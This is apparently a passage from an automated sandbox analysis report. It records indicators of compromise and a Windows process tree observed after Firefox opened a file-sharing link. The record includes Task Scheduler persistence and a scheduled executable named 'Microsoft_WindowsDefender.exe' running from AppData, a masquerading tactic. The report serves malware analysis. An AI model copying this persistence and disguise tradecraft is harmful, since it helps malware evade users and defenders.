Token: SeTakeOwnershipPrivilege	3240	WMIC.exe
Token: SeLoadDriverPrivilege	3240	WMIC.exe
Token: SeSystemProfilePrivilege	3240	WMIC.exe
Token: SeSystemtimePrivilege	3240	WMIC.exe
Token: SeProfSingleProcessPrivilege	3240	WMIC.exe
Token: SeIncBasePriorityPrivilege	3240	WMIC.exe

Suspicious use of FindShellTrayWindow 19 IoCs

Processes:

firefox.exe

pid	process
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe

Suspicious use of SendNotifyMessage 17 IoCs

Processes:

firefox.exe

pid	process
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe

Suspicious use of SetWindowsHookEx 28 IoCs

Processes:

firefox.exeConhost.exeConhost.exeConhost.exe

pid	process
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
1952	firefox.exe
5008	Conhost.exe
888	Conhost.exe
6532	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 2440 wrote to memory of 1952	2440	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3120	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe
PID 1952 wrote to memory of 3116	1952	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:388

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1188

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2728

C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
2⤵
PID:5696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1492

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1832

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x480 0x3d4
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2016

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2772

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2884

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2240

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3476

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://oxy.st/d/koRh"
2⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://oxy.st/d/koRh
3⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1952

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.0.479912907\1419221629" -parentBuildID 20230214051806 -prefsHandle 1788 -prefMapHandle 1780 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {076640bf-af2f-45d7-8460-df887c61db35} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 1864 13122309358 gpu
4⤵
PID:3120

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.1.284179627\1723342052" -parentBuildID 20230214051806 -prefsHandle 2452 -prefMapHandle 2448 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c71c22d-e4f3-40e0-a1f6-81472379d1de} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 2464 13115585958 socket
4⤵
- Checks processor information in registry
PID:3116

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.2.298126552\909316933" -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3020 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c424269-b434-4453-bf1e-adae1b2d7fa6} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 3036 1312533f758 tab
4⤵
PID:1052

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.3.454212335\425092288" -childID 2 -isForBrowser -prefsHandle 3676 -prefMapHandle 3672 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2690856e-02c3-4578-a3c5-b1224386bbd7} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 3688 13126fcc458 tab
4⤵
PID:2040

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.4.286218331\1733823029" -childID 3 -isForBrowser -prefsHandle 5292 -prefMapHandle 5156 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a62aec1-b83a-4a26-8255-501b332a8217} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5316 131292a4258 tab
4⤵
PID:3756

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.5.207201457\1397005508" -childID 4 -isForBrowser -prefsHandle 5468 -prefMapHandle 5476 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc067181-144e-441d-ad32-8df89dd64fd1} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5456 131292a4558 tab
4⤵
PID:4688

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.6.1015088603\570879595" -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5668 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddc959b3-f636-40e1-a888-f2a4e44c06ab} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5648 131292a4e58 tab
4⤵
PID:2212

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.7.536212920\1392400333" -childID 6 -isForBrowser -prefsHandle 5208 -prefMapHandle 5324 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ece72e4-0700-4096-ad9d-949dcdcdc39d} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5664 13128af4a58 tab
4⤵
PID:1532

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.8.1463422370\50031611" -childID 7 -isForBrowser -prefsHandle 9580 -prefMapHandle 9584 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44b2b14f-dfa5-477c-9338-d6aa1d0ac72b} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 9568 13129f53858 tab
4⤵
PID:2140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.9.1844242331\2033584055" -childID 8 -isForBrowser -prefsHandle 5364 -prefMapHandle 5376 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6eb8c318-a9d4-4890-84ff-30cee9e61825} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 9588 1312a9fbe58 tab
4⤵
PID:2636

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.10.1328604920\1737543712" -childID 9 -isForBrowser -prefsHandle 5788 -prefMapHandle 5800 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2beabf94-1943-48dc-9ffa-3ea424f82e3f} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5764 1312aa3d958 tab
4⤵
PID:4012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.11.868517530\95421248" -childID 10 -isForBrowser -prefsHandle 5924 -prefMapHandle 5536 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1aedb72a-21b5-4ca2-93a1-b893b23925b9} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5232 1312aab9e58 tab
4⤵
PID:3956

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.12.884787508\1022037086" -childID 11 -isForBrowser -prefsHandle 5652 -prefMapHandle 5824 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a3397d7-1ec3-4eb3-9df9-9e4dd306e176} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5656 1312960c158 tab
4⤵
PID:3448

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.13.1834949140\2082392990" -childID 12 -isForBrowser -prefsHandle 6116 -prefMapHandle 5784 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c573d4b-aa04-4945-a519-4defde093d90} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 6028 13115541858 tab
4⤵
PID:1976

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.14.256906417\1096281348" -childID 13 -isForBrowser -prefsHandle 1324 -prefMapHandle 6116 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {224935fd-4104-4a10-8432-57806fba9c4e} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 1552 1312c26a758 tab
4⤵
PID:5472

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.15.1686897193\2092741367" -childID 14 -isForBrowser -prefsHandle 6060 -prefMapHandle 9416 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d04e227-39b0-4c2a-bdd0-12992057fef1} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 4672 1312cbe7058 tab
4⤵
PID:392

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.16.1644288033\2024473277" -childID 15 -isForBrowser -prefsHandle 5968 -prefMapHandle 5240 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e9421d2-864d-4c56-b435-680af59575d0} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 9396 1312cbe7658 tab
4⤵
PID:220

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.17.33743741\193461413" -parentBuildID 20230214051806 -prefsHandle 4824 -prefMapHandle 9628 -prefsLen 28041 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb6c919e-f21d-4182-aa57-bf74c230d546} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 9228 1312d216a58 rdd
4⤵
PID:1208

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.18.825575147\779474152" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 5448 -prefMapHandle 9228 -prefsLen 28041 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {047df4d9-3b84-4f63-807c-15d2a68f2861} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 9268 1312d5b0258 utility
4⤵
PID:5592

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.19.1255621883\2105094285" -childID 16 -isForBrowser -prefsHandle 8936 -prefMapHandle 8928 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e23884c4-684e-420b-ad53-454d51f661ee} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 8944 1312e02e758 tab
4⤵
PID:4252

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.20.813333447\2107862247" -childID 17 -isForBrowser -prefsHandle 10220 -prefMapHandle 10224 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cce1870-a6fa-419d-aef3-684d689ea32e} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 8836 1312e16fc58 tab
4⤵
PID:5988

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.21.706606704\1321282707" -childID 18 -isForBrowser -prefsHandle 5016 -prefMapHandle 3828 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55987bf2-7f8f-4404-83b0-7b2db88d1e84} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 3824 1312db39258 tab
4⤵
PID:6928

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.22.1023838260\2143340558" -childID 19 -isForBrowser -prefsHandle 3824 -prefMapHandle 8948 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ac34de1-1bfd-4d0e-a093-186315266988} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 9108 1312f2db358 tab
4⤵
PID:4704

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.23.1872463135\1923757091" -childID 20 -isForBrowser -prefsHandle 8316 -prefMapHandle 8312 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec68a38a-014d-4b14-b588-8bb67b823ee8} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 8324 1312c588858 tab
4⤵
PID:6632

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.24.1051239838\1471110003" -childID 21 -isForBrowser -prefsHandle 7892 -prefMapHandle 8456 -prefsLen 28273 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd64dbe9-857f-4400-baa6-8e86d30529f2} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7852 1313140d858 tab
4⤵
PID:6500

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.25.1482989890\1088664573" -childID 22 -isForBrowser -prefsHandle 7644 -prefMapHandle 8084 -prefsLen 28273 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfe9a469-8fd8-413f-b2ca-44b634e78d77} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7632 13132335c58 tab
4⤵
PID:1808

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.26.1006624236\1908525083" -childID 23 -isForBrowser -prefsHandle 7476 -prefMapHandle 7472 -prefsLen 28273 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b646b9a7-992a-4dc7-a1f6-6058adc0f15f} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7492 13132334d58 tab
4⤵
PID:7076

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.27.1967091563\1779046165" -childID 24 -isForBrowser -prefsHandle 7216 -prefMapHandle 7220 -prefsLen 28273 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {068613fd-c59b-4aa2-9f5b-6531b171a69c} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7204 131325f5b58 tab
4⤵
PID:7160

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.28.1400256510\2061571907" -childID 25 -isForBrowser -prefsHandle 7012 -prefMapHandle 7072 -prefsLen 28273 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4812ce18-a8a9-46d8-9ac8-62c458319474} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7024 13132bbf558 tab
4⤵
PID:5756

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.29.1063267380\384432107" -childID 26 -isForBrowser -prefsHandle 7540 -prefMapHandle 8088 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebf4069f-67ed-42da-b99e-48b0be12d9a0} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7556 1312863c858 tab
4⤵
PID:3248

C:\Program Files\Mozilla Firefox\firefox.exe
